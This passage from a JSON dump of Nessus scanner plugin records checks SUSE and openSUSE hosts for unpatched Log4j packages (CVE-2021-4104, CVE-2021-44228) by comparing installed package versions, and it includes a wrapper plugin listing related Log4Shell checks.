Log4j 1.2 vulnerability (USN-5223-1)\": \"ubuntu_USN-5223-1.nasl\",\n \"156753 Apache Druid Log4Shell Direct Check (CVE-2021-44228)\": \"apache_druid_log4shell.nbin\",\n \"156893 Oracle Primavera Gateway (Jan 2022 CPU)\": \"oracle_primavera_gateway_cpu_jan_2022.nasl\",\n \"156891 Oracle Primavera P6 Enterprise Project Portfolio Management (Jan 2022 CPU)\": \"oracle_primavera_p6_eppm_cpu_jan_2022.nasl\",\n \"156871 Amazon Linux AMI : log4j (ALAS-2022-1562)\": \"ala_ALAS-2022-1562.nasl\",\n \"156932 VMware vRealize Operations Manager Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)\": \"vmware_vrealize_operations_manager_log4shell.nbin\",\n \"156941 MobileIron Core Log4Shell Direct Check (CVE-2021-44228)\": \"mobileiron_log4shell.nbin\",\n \"157137 Oracle Linux 6 : log4j (ELSA-2022-9056)\": \"oraclelinux_ELSA-2022-9056.nasl\",\n \"157159 Oracle Linux 8 : parfait:0.5 (ELSA-2022-0290)\": \"oraclelinux_ELSA-2022-0290.nasl\"\n};\n\nvar bullet_point_names_list = '';\nforeach name (keys(script_names_filenames)) {\n bullet_point_names_list += ' - ' + name + '\\n';\n}\n\nif (description)\n{\n script_id(156061);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/02\");\n\n script_name(english:\"Log4Shell Ecosystem Wrapper\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin serves as a launcher plugin for plugins in the Apache Log4j vulnerable ecosystem.\");\n script_set_attribute(attribute:\"description\", value:\n\"This plugin was used in the scan template 'Log4Shell Vulnerability Ecosystem' (prior to 2/2/2022) as a way to include other plugins related\nto the Log4j vulnerabilities CVE-2021-44228, CVE-2021-44832, CVE-2021-45046, and CVE-2021-4104, including those based \non patches from other vendors.\" + '\\n' + bullet_point_names_list + '\\n');\n script_set_attribute(attribute:\"solution\", value:\n\"N/A\");\n script_set_attribute(attribute:\"risk_factor\", value:\"None\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n foreach dep (script_names_filenames) {\n script_dependencies(dep);\n }\n\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-04-11T03:46:54", "description": "The remote SUSE Linux SLED12 / SLES12 host has packages installed that are affected by a vulnerability as referenced in the SUSE-SU-2021:4115-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. 
(CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-12-18T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : log4j (SUSE-SU-2021:4115-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-01-20T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:log4j", "p-cpe:/a:novell:suse_linux:log4j-manual", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2021-4115-1.NASL", "href": "https://www.tenable.com/plugins/nessus/156170", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2021:4115-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156170);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2021:4115-1\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : log4j (SUSE-SU-2021:4115-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLED12 / SLES12 host has packages installed that are affected by a vulnerability as referenced in\nthe SUSE-SU-2021:4115-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. 
The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193662\");\n # https://lists.suse.com/pipermail/sle-security-updates/2021-December/009918.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ed6408a4\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-4104\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j and / or log4j-manual packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:log4j-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLED12 / SLES12', 'SUSE ' + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE ' + os_ver, cpu);\n\nvar sp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(5)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP5\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(2|3|4|5)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4/5\", os_ver + \" SP\" + sp);\n\nvar pkgs = [\n {'reference':'log4j-1.2.15-126.6.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-12.3'},\n {'reference':'log4j-1.2.15-126.6.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-12.4'},\n {'reference':'log4j-1.2.15-126.6.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-12.5'},\n {'reference':'log4j-1.2.15-126.6.1', 'sp':'5', 'release':'SLED12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-sdk-release-12.5'},\n {'reference':'log4j-1.2.15-126.6.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-sdk-release-12.5'},\n {'reference':'log4j-manual-1.2.15-126.6.1', 'sp':'5', 'release':'SLED12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-sdk-release-12.5'},\n {'reference':'log4j-manual-1.2.15-126.6.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-sdk-release-12.5'},\n {'reference':'log4j-1.2.15-126.6.1', 'sp':'2', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-12.2'},\n {'reference':'log4j-1.2.15-126.6.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-12.3'},\n {'reference':'log4j-1.2.15-126.6.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-12.3'},\n {'reference':'log4j-1.2.15-126.6.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-12.4'},\n {'reference':'log4j-1.2.15-126.6.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-12.5'}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if 
(!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (exists_check) {\n if (!rpm_exists(release:release, rpm:exists_check)) continue;\n if ('ltss' >< tolower(exists_check)) ltss_caveat_required = TRUE;\n }\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n var ltss_plugin_caveat = NULL;\n if(ltss_caveat_required) ltss_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in SUSE Enterprise Linux Server LTSS\\n' +\n 'repositories. Access to these package security updates require\\n' +\n 'a paid SUSE LTSS subscription.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + ltss_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j / log4j-manual');\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T03:45:20", "description": "The remote SUSE Linux SLED15 / SLES15 host has packages installed that are affected by a vulnerability as referenced in the SUSE-SU-2021:4112-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. 
The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-12-18T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : log4j12 (SUSE-SU-2021:4112-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-01-20T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:log4j12", "p-cpe:/a:novell:suse_linux:log4j12-javadoc", "p-cpe:/a:novell:suse_linux:log4j12-manual", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2021-4112-1.NASL", "href": "https://www.tenable.com/plugins/nessus/156172", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2021:4112-1. 
The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156172);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2021:4112-1\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : log4j12 (SUSE-SU-2021:4112-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLED15 / SLES15 host has packages installed that are affected by a vulnerability as referenced in\nthe SUSE-SU-2021:4112-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. 
(CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193662\");\n # https://lists.suse.com/pipermail/sle-security-updates/2021-December/009916.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?51d6c27a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-4104\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j12, log4j12-javadoc and / or log4j12-manual packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:log4j12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:log4j12-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:log4j12-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLED15 / SLES15', 'SUSE ' + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE ' + os_ver, cpu);\n\nvar sp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLES15\" && (! 
preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP2/3\", os_ver + \" SP\" + sp);\n\nvar pkgs = [\n {'reference':'log4j12-1.2.17-4.3.1', 'sp':'2', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-basesystem-release-15.2'},\n {'reference':'log4j12-1.2.17-4.3.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-basesystem-release-15.2'},\n {'reference':'log4j12-1.2.17-4.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-basesystem-release-15.3'},\n {'reference':'log4j12-1.2.17-4.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-basesystem-release-15.3'},\n {'reference':'log4j12-javadoc-1.2.17-4.3.1', 'sp':'2', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.2'},\n {'reference':'log4j12-javadoc-1.2.17-4.3.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.2'},\n {'reference':'log4j12-manual-1.2.17-4.3.1', 'sp':'2', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.2'},\n {'reference':'log4j12-manual-1.2.17-4.3.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.2'},\n {'reference':'log4j12-javadoc-1.2.17-4.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'log4j12-javadoc-1.2.17-4.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'log4j12-manual-1.2.17-4.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'log4j12-manual-1.2.17-4.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 
'exists_check':'sle-module-development-tools-release-15.3'}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (exists_check) {\n if (!rpm_exists(release:release, rpm:exists_check)) continue;\n if ('ltss' >< tolower(exists_check)) ltss_caveat_required = TRUE;\n }\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j12 / log4j12-javadoc / log4j12-manual');\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T03:46:21", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the openSUSE-SU-2021:4112-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. 
The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-12-18T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : log4j12 (openSUSE-SU-2021:4112-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-01-20T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:log4j12", "p-cpe:/a:novell:opensuse:log4j12-javadoc", "p-cpe:/a:novell:opensuse:log4j12-manual", "cpe:/o:novell:opensuse:15.3"], "id": "OPENSUSE-2021-4112.NASL", "href": "https://www.tenable.com/plugins/nessus/156181", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:4112-1. 
The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156181);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n\n script_name(english:\"openSUSE 15 Security Update : log4j12 (openSUSE-SU-2021:4112-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the\nopenSUSE-SU-2021:4112-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. 
(CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193662\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/U355AEBE4AWYTPUPBMC3XAO6XBTWFRBL/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?72242b66\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-4104\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j12, log4j12-javadoc and / or log4j12-manual packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j12-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j12-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n 
